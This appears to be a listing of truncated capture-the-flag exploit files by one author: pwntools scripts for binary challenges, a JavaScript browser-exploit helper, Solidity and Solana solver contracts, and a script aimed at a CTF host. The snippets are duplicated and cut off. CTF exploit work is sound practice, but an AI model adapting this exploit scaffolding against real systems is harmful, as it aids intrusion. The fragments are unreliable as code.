Alejandro Taibo KaoRz

## exploit.py
import os
os.system('cargo build-bpf')

from borsh_construct import CStruct, U8

from pwn import *
from solders.pubkey import Pubkey as PublicKey
from solders.system_program import _ID as SYS_PROGRAM_ID

#context.log_level = 'DEBUG'

## solver.sol
// SPDX-License-Identifier: UNLICENSED

pragma solidity 0.8.16;

import "chall/Setup.sol";

contract Solver {

    MasterChefLike public constant masterchef = MasterChefLike(0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd);
    UniswapV2RouterLike public constant router = UniswapV2RouterLike(0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F);

## underleaf.py
#!/usr/bin/env python3
import requests
import random
import string
import hashlib
import sys
import json

def get_random_str(length):
    letters = string.ascii_letters

## avr.cfg
.ATtiny85

; IDA avr configuration for ATtiny85 (Author: @KaoRz)
; Documentation: https://www.microchip.com/en-us/product/ATTINY85

SUBARCH=25

RAM=512                 ; SRAM: 512 bytes
ROM=8192                ; Flash: 8 KB
EEPROM=512              ; EEPROM: 512 bytes

## UAMsolve.sol
pragma solidity ^0.4.26;

/*
    Distribution contract address: 0x2d29EBE818e771dE9ab67FA682FF16E11e152ab7
    UAMToken contract address: 0xd449e615f6d2A33F5aFB063aCce616b7A905c755
*/

import "./distribution.sol";

contract UAMSolver {

## pwn.js
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val, size) {
    f64_buf[0] = val;
    if(size == 32) {
        return BigInt(u64_buf[0]);
    } else if(size == 64) {
        return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);

## xpl.py
#!/usr/bin/env python3
from pwn import *

context.terminal = ["tmux", "sp", "-h"]
#context.log_level = "DEBUG"

elf  = ELF("./pwn_slot")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

## flag.py
#!/usr/bin/env python3
from pwn import *

HOST = "chal.duc.tf"
PORT = 30004
XPL_PATH = "./pwn.js"

f_xpl = open(XPL_PATH, "r")
data_xpl = f_xpl.read()

## xpl.py
#!/usr/bin/env python3
from pwn import *

context.terminal = ['tmux', 'sp', '-h']
#context.log_level = 'DEBUG'

elf = ELF("./chall")
LOCAL = False

def create_house(name, size, description):

## exploit.py
#!/usr/bin/env python
from pwn import *

context.terminal = ['tmux', 'sp', '-h']
#context.log_level = 'DEBUG'

elf = ELF("./tukro")
libc = ELF("./libc.so.6", checksec = False)
LOCAL = False
	import os
	os.system('cargo build-bpf')

	from borsh_construct import CStruct, U8

	from pwn import *
	from solders.pubkey import Pubkey as PublicKey
	from solders.system_program import _ID as SYS_PROGRAM_ID

	#context.log_level = 'DEBUG'
	// SPDX-License-Identifier: UNLICENSED

	pragma solidity 0.8.16;

	import "chall/Setup.sol";

	contract Solver {

	MasterChefLike public constant masterchef = MasterChefLike(0xc2EdaD668740f1aA35E4D8f227fB8E17dcA888Cd);
	UniswapV2RouterLike public constant router = UniswapV2RouterLike(0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F);
	#!/usr/bin/env python3
	import requests
	import random
	import string
	import hashlib
	import sys
	import json

	def get_random_str(length):
	letters = string.ascii_letters
	.ATtiny85

	; IDA avr configuration for ATtiny85 (Author: @KaoRz)
	; Documentation: https://www.microchip.com/en-us/product/ATTINY85

	SUBARCH=25

	RAM=512 ; SRAM: 512 bytes
	ROM=8192 ; Flash: 8 KB
	EEPROM=512 ; EEPROM: 512 bytes
	pragma solidity ^0.4.26;

	/*
	Distribution contract address: 0x2d29EBE818e771dE9ab67FA682FF16E11e152ab7
	UAMToken contract address: 0xd449e615f6d2A33F5aFB063aCce616b7A905c755
	*/

	import "./distribution.sol";

	contract UAMSolver {
	var buf = new ArrayBuffer(8);
	var f64_buf = new Float64Array(buf);
	var u64_buf = new Uint32Array(buf);

	function ftoi(val, size) {
	f64_buf[0] = val;
	if(size == 32) {
	return BigInt(u64_buf[0]);
	} else if(size == 64) {
	return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
	#!/usr/bin/env python3
	from pwn import *

	context.terminal = ["tmux", "sp", "-h"]
	#context.log_level = "DEBUG"

	elf = ELF("./pwn_slot")
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
	one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
	#!/usr/bin/env python3
	from pwn import *

	HOST = "chal.duc.tf"
	PORT = 30004
	XPL_PATH = "./pwn.js"

	f_xpl = open(XPL_PATH, "r")
	data_xpl = f_xpl.read()
	#!/usr/bin/env python3
	from pwn import *

	context.terminal = ['tmux', 'sp', '-h']
	#context.log_level = 'DEBUG'

	elf = ELF("./chall")
	LOCAL = False

	def create_house(name, size, description):
	#!/usr/bin/env python
	from pwn import *

	context.terminal = ['tmux', 'sp', '-h']
	#context.log_level = 'DEBUG'

	elf = ELF("./tukro")
	libc = ELF("./libc.so.6", checksec = False)
	LOCAL = False